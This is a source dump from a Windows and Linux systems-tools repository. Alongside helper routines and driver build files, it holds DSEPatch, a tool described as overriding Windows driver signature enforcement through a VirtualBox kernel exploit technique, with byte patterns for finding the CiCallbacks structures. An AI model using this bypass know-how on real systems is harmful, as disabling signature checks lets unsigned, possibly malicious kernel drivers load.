_WCHAR_T_DEFINED 2 | typedef unsigned short wchar_t; 3 | #define _WCHAR_T_DEFINED 4 | #endif /* _WCHAR_T_DEFINED */ 5 | 6 | #ifndef _SIZE_T_DEFINED 7 | #ifdef _WIN64 8 | typedef unsigned __int64 size_t; 9 | #else /* _WIN64 */ 10 | typedef __w64 unsigned int size_t; 11 | #endif /* _WIN64 */ 12 | #define _SIZE_T_DEFINED 13 | #endif /* _SIZE_T_DEFINED */ 14 | 15 | __forceinline char locase_a(char c) 16 | { 17 | if ((c >= 'A') && (c <= 'Z')) 18 | return c + 0x20; 19 | else 20 | return c; 21 | } 22 | 23 | __forceinline wchar_t locase_w(wchar_t c) 24 | { 25 | if ((c >= 'A') && (c <= 'Z')) 26 | return c + 0x20; 27 | else 28 | return c; 29 | } 30 | 31 | __forceinline char byteabs(char x) { 32 | if (x < 0) 33 | return -x; 34 | return x; 35 | } 36 | 37 | __forceinline int _isdigit_a(char x) { 38 | return ((x 
>= '0') && (x <= '9')); 39 | } 40 | 41 | __forceinline int _isdigit_w(wchar_t x) { 42 | return ((x >= L'0') && (x <= L'9')); 43 | } 44 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/u64tohex.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t u64tohex_a(unsigned long long x, char *s) 4 | { 5 | char p; 6 | size_t c; 7 | 8 | if (s==0) 9 | return 16; 10 | 11 | for (c=0; c<16; c++) { 12 | p = (char)(x & 0xf); 13 | x >>= 4; 14 | 15 | if (p<10) 16 | p += '0'; 17 | else 18 | p = 'A' + (p-10); 19 | 20 | s[15-c] = p; 21 | } 22 | 23 | s[16] = 0; 24 | return 16; 25 | } 26 | 27 | size_t u64tohex_w(unsigned long long x, wchar_t *s) 28 | { 29 | wchar_t p; 30 | size_t c; 31 | 32 | if (s==0) 33 | return 16; 34 | 35 | for (c = 0; c<16; c++) { 36 | p = (wchar_t)(x & 0xf); 37 | x >>= 4; 38 | 39 | if (p<10) 40 | p += L'0'; 41 | else 42 | p = L'A' + (p-10); 43 | 44 | s[15-c] = p; 45 | } 46 | 47 | s[16] = 0; 48 | return 16; 49 | } 50 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/u64tostr.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t u64tostr_a(unsigned long long x, char *s) 4 | { 5 | unsigned long long t = x; 6 | size_t i, r=1; 7 | 8 | while ( t >= 10 ) { 9 | t /= 10; 10 | r++; 11 | } 12 | 13 | if (s == 0) 14 | return r; 15 | 16 | for (i = r; i != 0; i--) { 17 | s[i-1] = (char)(x % 10) + '0'; 18 | x /= 10; 19 | } 20 | 21 | s[r] = (char)0; 22 | return r; 23 | } 24 | 25 | size_t u64tostr_w(unsigned long long x, wchar_t *s) 26 | { 27 | unsigned long long t = x; 28 | size_t i, r=1; 29 | 30 | while ( t >= 10 ) { 31 | t /= 10; 32 | r++; 33 | } 34 | 35 | if (s == 0) 36 | return r; 37 | 38 | for (i = r; i != 0; i--) { 39 | s[i-1] = (wchar_t)(x % 10) + L'0'; 40 | x /= 10; 41 | } 42 | 43 | s[r] = (wchar_t)0; 
44 | return r; 45 | } 46 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/ultohex.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t ultohex_a(unsigned long x, char *s) 4 | { 5 | char p; 6 | size_t c; 7 | 8 | if (s==0) 9 | return 8; 10 | 11 | for (c=0; c<8; c++) { 12 | p = (char)(x & 0xf); 13 | x >>= 4; 14 | 15 | if (p<10) 16 | p += '0'; 17 | else 18 | p = 'A' + (p-10); 19 | 20 | s[7-c] = p; 21 | } 22 | 23 | s[8] = 0; 24 | return 8; 25 | } 26 | 27 | size_t ultohex_w(unsigned long x, wchar_t *s) 28 | { 29 | wchar_t p; 30 | size_t c; 31 | 32 | if (s==0) 33 | return 8; 34 | 35 | for (c=0; c<8; c++) { 36 | p = (wchar_t)(x & 0xf); 37 | x >>= 4; 38 | 39 | if (p<10) 40 | p += L'0'; 41 | else 42 | p = L'A' + (p-10); 43 | 44 | s[7-c] = p; 45 | } 46 | 47 | s[8] = 0; 48 | return 8; 49 | } 50 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/minirtl/ultostr.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t ultostr_a(unsigned long x, char *s) 4 | { 5 | unsigned long t=x; 6 | size_t i, r=1; 7 | 8 | while ( t >= 10 ) { 9 | t /= 10; 10 | r++; 11 | } 12 | 13 | if (s == 0) 14 | return r; 15 | 16 | for (i = r; i != 0; i--) { 17 | s[i-1] = (char)(x % 10) + '0'; 18 | x /= 10; 19 | } 20 | 21 | s[r] = (char)0; 22 | return r; 23 | } 24 | 25 | size_t ultostr_w(unsigned long x, wchar_t *s) 26 | { 27 | unsigned long t=x; 28 | size_t i, r=1; 29 | 30 | while ( t >= 10 ) { 31 | t /= 10; 32 | r++; 33 | } 34 | 35 | if (s == 0) 36 | return r; 37 | 38 | for (i = r; i != 0; i--) { 39 | s[i-1] = (wchar_t)(x % 10) + L'0'; 40 | x /= 10; 41 | } 42 | 43 | s[r] = (wchar_t)0; 44 | return r; 45 | } 46 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/resource.h: 
-------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 3 | // Used by resource.rc 4 | 5 | // Next default values for new objects 6 | // 7 | #ifdef APSTUDIO_INVOKED 8 | #ifndef APSTUDIO_READONLY_SYMBOLS 9 | #define _APS_NEXT_RESOURCE_VALUE 101 10 | #define _APS_NEXT_COMMAND_VALUE 40001 11 | #define _APS_NEXT_CONTROL_VALUE 1001 12 | #define _APS_NEXT_SYMED_VALUE 101 13 | #endif 14 | #endif 15 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/resource.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/DSEPatch/DSEPatch/resource.rc -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/se_patterns.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2016 - 2019 4 | * 5 | * TITLE: SE_PATTERNS.H 6 | * 7 | * VERSION: 1.05 8 | * 9 | * DATE: 22 Jan 2019 10 | * 11 | * Header with search patterns used by DSEPatch. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 
17 | * 18 | *******************************************************************************/ 19 | 20 | #pragma once 21 | 22 | 23 | /*+++ 24 | 25 | SeCiCallbacks search patterns 26 | 27 | +++*/ 28 | 29 | //Windows 10 TH1/TH2 30 | BYTE SeCiCallbacksPattern_10240_10586[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0x98, 0x00, 0x00, 0x00 }; 31 | 32 | //Windows 10 RS1 33 | BYTE SeCiCallbacksPattern_14393[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0xB0, 0x00, 0x00, 0x00 }; 34 | 35 | //Windows 10 RS2/RS3 36 | BYTE SeCiCallbacksPattern_15063_16299[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0xC0, 0x00, 0x00, 0x00 }; 37 | 38 | //Windows 10 RS4/RS5 39 | BYTE SeCiCallbacksPattern_17134_17763[] = { 0x48, 0x83, 0xEC, 0x20, 0xBB, 0xD0, 0x00, 0x00, 0x00 }; 40 | 41 | //Windows 8/8.1 42 | BYTE SeCiCallbacksPattern_9200_9600[] = { 0x48, 0x83, 0xEC, 0x20, 0xBF, 0x06, 0x00, 0x00, 0x00 }; 43 | 44 | BYTE SeCiCallbacksMatchingPattern[] = { 0x48, 0x8D, 0x0D }; 45 | 46 | //Windows 7 47 | BYTE g_CiCallbacksPattern_7601[] = { 0x8D, 0x7B, 0x06, 0x48, 0x89, 0x05 }; 48 | BYTE g_CiCallbacksMatchingPattern[] = { 0x48, 0x89, 0x05 }; 49 | -------------------------------------------------------------------------------- /source/DSEPatch/DSEPatch/sup.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************* 2 | * 3 | * (C) COPYRIGHT AUTHORS, 2016 - 2019 4 | * 5 | * TITLE: SUP.H 6 | * 7 | * VERSION: 1.00 8 | * 9 | * DATE: 23 Jan 2019 10 | * 11 | * Common header file for the program support routines. 12 | * 13 | * THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 14 | * ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED 15 | * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 16 | * PARTICULAR PURPOSE. 
17 | * 18 | *******************************************************************************/ 19 | #pragma once 20 | 21 | typedef NTSTATUS(NTAPI *PENUMOBJECTSCALLBACK)(POBJECT_DIRECTORY_INFORMATION Entry, PVOID CallbackParam); 22 | 23 | typedef struct _OBJSCANPARAM { 24 | PWSTR Buffer; 25 | ULONG BufferSize; 26 | } OBJSCANPARAM, *POBJSCANPARAM; 27 | 28 | void supCopyMemory( 29 | _Inout_ void *dest, 30 | _In_ size_t ccdest, 31 | _In_ const void *src, 32 | _In_ size_t ccsrc); 33 | 34 | PVOID supGetSystemInfo( 35 | _In_ SYSTEM_INFORMATION_CLASS InfoClass); 36 | 37 | BOOL supBackupVBoxDrv( 38 | _In_ BOOL bRestore); 39 | 40 | DWORD supWriteBufferToFile( 41 | _In_ LPWSTR lpFileName, 42 | _In_ PVOID Buffer, 43 | _In_ DWORD BufferSize); 44 | 45 | BOOL supIsObjectExists( 46 | _In_ LPWSTR RootDirectory, 47 | _In_ LPWSTR ObjectName); 48 | 49 | ULONG_PTR supGetModuleBaseByName( 50 | _In_ LPSTR ModuleName); 51 | 52 | ULONG_PTR supGetNtOsBase( 53 | VOID); 54 | 55 | BOOL supIsVBoxInstalled( 56 | VOID); 57 | 58 | PVOID supLookupImageSectionByName( 59 | _In_ CHAR* SectionName, 60 | _In_ ULONG SectionNameLength, 61 | _In_ PVOID DllBase, 62 | _Out_ PULONG SectionSize); 63 | 64 | ULONG_PTR supFindCiCallbacks( 65 | _In_ ULONG NtBuildNumber, 66 | _In_ ULONG NtOsSize, 67 | _In_ ULONG_PTR NtOsBase, 68 | _In_ HMODULE hNtOs); 69 | 70 | PVOID supFindPattern( 71 | _In_ CONST PBYTE Buffer, 72 | _In_ SIZE_T BufferSize, 73 | _In_ CONST PBYTE Pattern, 74 | _In_ SIZE_T PatternSize); 75 | 76 | ULONG supSizeOfProc( 77 | _In_ PBYTE FunctionPtr); 78 | 79 | ULONG_PTR supGetProcAddress( 80 | _In_ ULONG_PTR KernelBase, 81 | _In_ ULONG_PTR KernelImage, 82 | _In_ LPCSTR FunctionName); 83 | 84 | #define PathFileExists(lpszPath) (GetFileAttributes(lpszPath) != (DWORD)-1) 85 | -------------------------------------------------------------------------------- /source/DSEPatch/README.md: -------------------------------------------------------------------------------- 1 | 2 | # DSEPatch 3 | ## Windows x64 Driver 
Signature Enforcement Overrider 4 | 5 | # System Requirements 6 | 7 | x64 Windows Vista/7/8/8.1/10. 8 | 9 | Windows 10: warning, see PatchGuard note below. 10 | 11 | DSEPatch is designed only for x64 Windows. 12 | 13 | Administrative privilege is required. 14 | 15 | Obsolete, do not use, see PatchGuard note below. 16 | 17 | # Build 18 | 19 | DSEPatch comes with full source code. 20 | In order to build from source you need Microsoft Visual Studio 2013 U4 or a later version. 21 | 22 | # How it works 23 | 24 | It uses the WinNT/Turla VirtualBox kernel-mode exploit technique to "patch" the ntoskrnl callback structure filled in by CI.dll. The structure is named g_CiCallbacks on Windows 7 and SeCiCallbacks on everything above. DSEPatch replaces the CiValidateImageHeader and CiValidateImageData callbacks in this structure with a stub routine that always returns STATUS_SUCCESS. The original state can be restored by running dsepatch with the -r command, e.g. dsepatch -r 25 | 26 | AS-IS, no warranty. 27 | 28 | # PatchGuard incompatibility 29 | 30 | Windows 10 PatchGuard detects this modification and bugchecks the system. Bugcheck is 109 (CRITICAL_STRUCTURE_CORRUPTION), 0 - generic data region. 
31 | 32 | # Authors 33 | 34 | (c) 2016 - 2019 DSEPatch Project 35 | -------------------------------------------------------------------------------- /source/DSEPatch/changelog.txt: -------------------------------------------------------------------------------- 1 | 1.0.1 02 Aug 2016 2 | Initial release 3 | 4 | 1.0.2 14 Apr 2017 5 | Added offsets for RS2, rtls update 6 | 7 | 1.0.3 11 Oct 2017 8 | Added offsets for RS3 9 | 10 | 1.0.4 01 May 2018 11 | Added offset for RS4 12 | 13 | 1.0.5 22 Jan 2019 14 | Added offset for RS5, recreated in vs17 and rearranged, rtls update, made it public 15 | -------------------------------------------------------------------------------- /source/DrvTools/readme.txt: -------------------------------------------------------------------------------- 1 | DrvTools 1.0.2303 2 | Build with Lazarus FPC v3.2.2 3 | -------------------------------------------------------------------------------- /source/DrvTools/src/DrvTools.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/DrvTools/src/DrvTools.ico -------------------------------------------------------------------------------- /source/DrvTools/src/DrvTools.lpr: -------------------------------------------------------------------------------- 1 | program DrvTools; 2 | 3 | {$mode objfpc}{$H+} 4 | 5 | uses 6 | {$IFDEF UNIX}{$IFDEF UseCThreads} 7 | cthreads, 8 | {$ENDIF}{$ENDIF} 9 | Interfaces, // this includes the LCL widgetset 10 | Forms, Unit1, scmsup, nativesup; 11 | 12 | {$R *.res} 13 | 14 | begin 15 | RequireDerivedFormResource:=True; 16 | Application.Scaled:=True; 17 | Application.Initialize; 18 | Application.CreateForm(TMainForm, MainForm); 19 | Application.Run; 20 | end. 
21 | 22 | -------------------------------------------------------------------------------- /source/DrvTools/src/DrvTools.res: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/DrvTools/src/DrvTools.res -------------------------------------------------------------------------------- /source/DrvTools/src/ppas.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | SET THEFILE=C:\Work\DrvTools\DrvTools32.exe 3 | echo Linking %THEFILE% 4 | C:\lazarus\fpc\3.2.0\bin\x86_64-win64\ld.exe -b pei-i386 -m i386pe --gc-sections -s --subsystem windows --entry=_WinMainCRTStartup -o C:\Work\DrvTools\DrvTools32.exe C:\Work\DrvTools\link.res 5 | if errorlevel 1 goto linkend 6 | C:\lazarus\fpc\3.2.0\bin\x86_64-win64\postw32.exe --subsystem gui --input C:\Work\DrvTools\DrvTools32.exe --stack 16777216 7 | if errorlevel 1 goto linkend 8 | goto end 9 | :asmend 10 | echo An error occurred while assembling %THEFILE% 11 | goto end 12 | :linkend 13 | echo An error occurred while linking %THEFILE% 14 | :end 15 | -------------------------------------------------------------------------------- /source/DrvTools/src/rsrc/about64.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/DrvTools/src/rsrc/about64.ico -------------------------------------------------------------------------------- /source/DrvTools/src/rsrc/main.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hfiref0x/Misc/edbcd01340327732b55afcd52e6540a2cbe4eced/source/DrvTools/src/rsrc/main.ico -------------------------------------------------------------------------------- /source/IntelNal/Kconfig: 
-------------------------------------------------------------------------------- 1 | config INTEL_IQVANDROID 2 | tristate "iqvandroid kernel driver for BYT MFG tools" 3 | default n 4 | help 5 | Select this module for support BYT MFG tools. 6 | 7 | -------------------------------------------------------------------------------- /source/IntelNal/Makefile: -------------------------------------------------------------------------------- 1 | iqvandroid-objs := \ 2 | src/linuxnaldriver.o \ 3 | src/linuxdriverpci_i.o \ 4 | src/linuxdriveros_i.o \ 5 | src/linuxdriverdevice_i.o \ 6 | src/nalioctldrv.o 7 | 8 | EXTRA_CFLAGS := \ 9 | -DNAL_LINUX -DNAL_LINUX_ANDROID -DNAL_DRIVER -DLINUX -D__KERNEL__ -DMODULE \ 10 | -Idrivers/external_drivers/drivers/misc/iqvandroid/inc/ \ 11 | -Idrivers/external_drivers/drivers/misc/iqvandroid/inc/linux \ 12 | 13 | obj-$(CONFIG_INTEL_IQVANDROID) = iqvandroid.o 14 | -------------------------------------------------------------------------------- /source/IntelNal/README.md: -------------------------------------------------------------------------------- 1 | Intel QV Linux kernel driver, see COPYING for more info 2 | -------------------------------------------------------------------------------- /source/IntelNal/inc/linux/linuxdriverdevice_i.h: -------------------------------------------------------------------------------- 1 | /* 2 | * Intel QV Linux kernel driver 3 | * Copyright (c) 1999 - 2013, Intel Corporation. 4 | * 5 | * This program is free software; you can redistribute it and/or modify it 6 | * under the terms and conditions of the GNU General Public License, 7 | * version 2, as published by the Free Software Foundation. 8 | * 9 | * This program is distributed in the hope it will be useful, but WITHOUT 10 | * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or 11 | * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for 12 | * more details. 
13 | * 14 | * You should have received a copy of the GNU General Public License along with 15 | * this program; if not, write to the Free Software Foundation, Inc., 16 | * 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA. 17 | * 18 | */ 19 | 20 | /* 21 | * Module Name: 22 | * linuxdriverdevice_i.h 23 | * 24 | * Abstract: 25 | * This file contains Linux Specific OS functions that are required 26 | * to correctly communicate with a device in Linux. 27 | */ 28 | 29 | 30 | #ifndef _LINUXDRIVERDEVICE_I_H_ 31 | #define _LINUXDRIVERDEVICE_I_H_ 32 | 33 | #include 34 | #include 35 | 36 | BOOLEAN 37 | _NalMarkAdapterInUse( 38 | IN NAL_DEVICE_LOCATION NalDevice, 39 | IN BOOLEAN Lock 40 | ); 41 | 42 | typedef struct _NAL_OS_SPECIFIC_DEVICE 43 | { 44 | UINT32 ReferenceCount; 45 | } NAL_OS_SPECIFIC_DEVICE; 46 | 47 | #define _NalReadPortOs8(a,p) NalReadPort8(p) 48 | #define _NalReadPortOs16(a,p) NalReadPort16(p) 49 | #define _NalReadPortOs32(a,p) NalReadPort32(p) 50 | #define _NalWritePortOs8(a,p,v) NalWritePort8(p,v) 51 | #define _NalWritePortOs16(a,p,v) NalWritePort16(p,v) 52 | #define _NalWritePortOs32(a,p,v) NalWritePort32(p,v) 53 | #define _NalReadRegisterOs8(a,d) NalReadRegister8(d) 54 | #define _NalReadRegisterOs16(a,d) NalReadRegister16(d) 55 | #define _NalReadRegisterOs32(a,d) NalReadRegister32(d) 56 | #define _NalWriteRegisterOs8(a,d,v) NalWriteRegister8(d,v) 57 | #define _NalWriteRegisterOs16(a,d,v) NalWriteRegister16(d,v) 58 | #define _NalWriteRegisterOs32(a,d,v) NalWriteRegister32(d,v) 59 | 60 | KVOID* 61 | _NalAllocateMemoryNonPagedPci( 62 | IN KVOID* PDev, 63 | IN UINT32 ByteCount, 64 | IN UINT32 Alignment, 65 | OUT NAL_PHYSICAL_ADDRESS* PhysicalAddress, 66 | IN CHAR* NamedLocator, 67 | IN UINT32 LineNumber 68 | ); 69 | 70 | VOID 71 | NalFreeMemoryNonPagedPci( 72 | IN KVOID* PDev, 73 | IN KVOID* Address, 74 | IN NAL_PHYSICAL_ADDRESS PhysicalAddress, 75 | IN UINT32 Size 76 | ); 77 | 78 | #endif 79 | 
-------------------------------------------------------------------------------- /source/IntelNal/src/iqvlinux.spec: -------------------------------------------------------------------------------- 1 | Summary: QV Tools driver 2 | Name: iqvlinux 3 | Version: 1.1.4.5 4 | Release: 0 5 | BuildArch: noarch 6 | License: GPL 7 | Vendor: Intel 8 | Group: System Environment/Kernel 9 | URL: http://www.intel.com 10 | 11 | Source: iqvlinux.tar.gz 12 | BuildRoot: %{_tmppath}/%{name}-%{version}-root 13 | 14 | 15 | %description 16 | Network adapter driver for QV Tools. 17 | 18 | %prep 19 | %setup -c %{name} -n %{name} 20 | 21 | %build 22 | 23 | %install 24 | if [ -d %{buildroot} ]; then 25 | rm -fr %{buildroot} 26 | fi 27 | mkdir -p %{buildroot}/%{_datadir}/%{name}-%{version}-root 28 | make -f Makefile -C src/linux/driver \ 29 | NALDIR=/usr/src/redhat/BUILD/%{name} \ 30 | DESTDIR=%{buildroot}/%{_datadir}/%{name}-%{version}-root installrpm 31 | 32 | %post 33 | # V=1 if you want verbose output 34 | make -f Makefile -C %{_datadir}/%{name}-%{version}-root/src/linux/driver \ 35 | NALDIR=%{_datadir}/%{name}-%{version}-root/ 36 | %{_datadir}/%{name}-%{version}-root/src/linux/driver/nalinstall %{_datadir}/%{name}-%{version}-root/src/linux/driver 37 | rm -fr %{_datadir}/%{name}-%{version}-root/* 38 | 39 | %verifyscript 40 | if [ ! -e /lib/modules/`uname -r`/kernel/drivers/net/iqvlinux.ko ] 41 | then 42 | echo "QV Linux Driver is missing" 43 | exit 1 44 | fi 45 | 46 | %clean 47 | rm -fr %{buildroot} 48 | 49 | %files 50 | %defattr(-, root, root, 0755) 51 | %{_datadir}/%{name}-%{version}-root/ 52 | 53 | %changelog 54 | * %(date "+%a %b %d %Y") %name %{version} 55 | - Automatic build. 56 | -------------------------------------------------------------------------------- /source/IntelNal/src/nalinstall: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | # Copyright(c) 1999 - 2013 Intel Corporation. All rights reserved. 
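#
# This program is free software; you can redistribute it and/or modify
# it under the terms of version 2 of the GNU General Public License as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
# The full GNU General Public License is included in this distribution
# in the file called LICENSE.GPL.
#
# Contact Information:
# e1000-devel Mailing List
# Intel Corporation, 5200 N.E. Elam Young Parkway, Hillsboro, OR 97124-6497

# Installs the iqvlinux kernel module for the running kernel.
#
# Usage: nalinstall [SOURCE_DIR]
#   SOURCE_DIR  directory holding the built module; defaults to the current
#               directory when omitted or empty.
#
# The script writes under /lib/modules and calls rmmod, so it has to run with
# root privileges. Whatever file named iqvlinux.ko (or iqvlinux.o) sits in
# SOURCE_DIR is installed as a kernel module without any integrity check, so
# SOURCE_DIR must not be writable by unprivileged users.
#
# Exit status: 0 on success, 1 when the module file is missing or the copy fails.

SOURCE_DIR=${1:-$PWD}

KernelVersion=$(uname -r)

# First three characters of the release, with 2.5 folded into 2.6; only a
# result of "2.4" selects the old .o module suffix.
K_VERSION=$(printf '%s\n' "$KernelVersion" | cut -c1-3 | sed 's/2\.[56]/2\.6/')

DriverName=iqvlinux
if [ "$K_VERSION" = "2.4" ]
then
    DriverFileName=$DriverName.o
else
    DriverFileName=$DriverName.ko
fi

ModuleDir=/lib/modules/$KernelVersion/kernel/drivers/net
ModuleSource=$SOURCE_DIR/$DriverFileName

# Check the new module exists before removing the installed one, so a wrong
# SOURCE_DIR cannot leave the system without any copy of the driver.
if [ ! -f "$ModuleSource" ]
then
    echo "nalinstall: $ModuleSource not found" >&2
    exit 1
fi

# All expansions are quoted: this runs as root, and an unquoted path with
# spaces or glob characters would make rm/cp act on unintended files.
rm -f -- "$ModuleDir/$DriverFileName"

# Name the destination file explicitly so that a missing module directory is
# reported as an error instead of cp creating a plain file called "net".
if ! cp -- "$ModuleSource" "$ModuleDir/$DriverFileName"
then
    echo "nalinstall: failed to copy $DriverFileName to $ModuleDir" >&2
    exit 1
fi

# Install the node and driver
echo "Try and unload the old driver..."
# Best effort: rmmod fails harmlessly when the driver is not loaded
# (-s sends its error output to syslog).
rmmod -s "$DriverName"
echo "Installed!!"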
50 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.28307.168 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "srvany", "srvany2\srvany2.vcxproj", "{DA2D114B-786B-4999-8338-7D2A772EAE69}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x86 = Debug|x86 11 | Release|x86 = Release|x86 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Debug|x86.ActiveCfg = Debug|Win32 15 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Debug|x86.Build.0 = Debug|Win32 16 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Release|x86.ActiveCfg = Release|Win32 17 | {DA2D114B-786B-4999-8338-7D2A772EAE69}.Release|x86.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {9159E424-291B-45AC-B085-CD7D7837B77D} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/minirtl/_strcat.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcat_a(char *dest, const char *src) 4 | { 5 | if ( (dest==0) || (src==0) ) 6 | return dest; 7 | 8 | while ( *dest!=0 ) 9 | dest++; 10 | 11 | while ( *src!=0 ) { 12 | *dest = *src; 13 | dest++; 14 | src++; 15 | } 16 | 17 | *dest = 0; 18 | return dest; 19 | } 20 | 21 | wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src) 22 | { 23 | if ( (dest==0) || (src==0) ) 24 | return dest; 25 | 26 | while ( 
*dest!=0 ) 27 | dest++; 28 | 29 | while ( *src!=0 ) { 30 | *dest = *src; 31 | dest++; 32 | src++; 33 | } 34 | 35 | *dest = 0; 36 | return dest; 37 | } 38 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/minirtl/_strcpy.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | char *_strcpy_a(char *dest, const char *src) 4 | { 5 | char *p; 6 | 7 | if ( (dest==0) || (src==0) ) 8 | return dest; 9 | 10 | if (dest == src) 11 | return dest; 12 | 13 | p = dest; 14 | while ( *src!=0 ) { 15 | *p = *src; 16 | p++; 17 | src++; 18 | } 19 | 20 | *p = 0; 21 | return dest; 22 | } 23 | 24 | wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src) 25 | { 26 | wchar_t *p; 27 | 28 | if ((dest == 0) || (src == 0)) 29 | return dest; 30 | 31 | if (dest == src) 32 | return dest; 33 | 34 | p = dest; 35 | while ( *src!=0 ) { 36 | *p = *src; 37 | p++; 38 | src++; 39 | } 40 | 41 | *p = 0; 42 | return dest; 43 | } 44 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/minirtl/_strlen.c: -------------------------------------------------------------------------------- 1 | #include "rtltypes.h" 2 | 3 | size_t _strlen_a(const char *s) 4 | { 5 | char *s0 = (char *)s; 6 | 7 | if ( s==0 ) 8 | return 0; 9 | 10 | while ( *s!=0 ) 11 | s++; 12 | 13 | return (s-s0); 14 | } 15 | 16 | size_t _strlen_w(const wchar_t *s) 17 | { 18 | wchar_t *s0 = (wchar_t *)s; 19 | 20 | if ( s==0 ) 21 | return 0; 22 | 23 | while ( *s!=0 ) 24 | s++; 25 | 26 | return (s-s0); 27 | } 28 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/minirtl/cmdline.h: -------------------------------------------------------------------------------- 1 | #ifndef _CMDLINEH_ 2 | #define _CMDLINEH_ 3 | 4 | BOOL GetCommandLineParamW( 5 | IN LPCWSTR CmdLine, 6 | IN ULONG ParamIndex, 7 | OUT LPWSTR Buffer, 8 | IN 
ULONG BufferSize, 9 | OUT PULONG ParamLen 10 | ); 11 | 12 | BOOL GetCommandLineParamA( 13 | IN LPCSTR CmdLine, 14 | IN ULONG ParamIndex, 15 | OUT LPSTR Buffer, 16 | IN ULONG BufferSize, 17 | OUT PULONG ParamLen 18 | ); 19 | 20 | char *ExtractFilePathA(const char *FileName, char *FilePath); 21 | wchar_t *ExtractFilePathW(const wchar_t *FileName, wchar_t *FilePath); 22 | 23 | #ifdef UNICODE 24 | 25 | #define ExtractFilePath ExtractFilePathW 26 | #define GetCommandLineParam GetCommandLineParamW 27 | 28 | #else // ANSI 29 | 30 | #define ExtractFilePath ExtractFilePathA 31 | #define GetCommandLineParam GetCommandLineParamA 32 | 33 | #endif 34 | 35 | #endif /* _CMDLINEH_ */ 36 | -------------------------------------------------------------------------------- /source/ROS/srvany2/srvany2/minirtl/rtltypes.h: -------------------------------------------------------------------------------- 1 | #ifndef _WCHAR_T_DEFINED 2 | typedef unsigned short wchar_t; 3 | #define _WCHAR_T_DEFINED 4 | #endif /* _WCHAR_T_DEFINED */ 5 | 6 | #ifndef _SIZE_T_DEFINED 7 | #ifdef _WIN64 8 | typedef unsigned __int64 size_t; 9 | #else /* _WIN64 */ 10 | typedef __w64 unsigned int size_t; 11 | #endif /* _WIN64 */ 12 | #define _SIZE_T_DEFINED 13 | #endif /* _SIZE_T_DEFINED */ 14 | 15 | 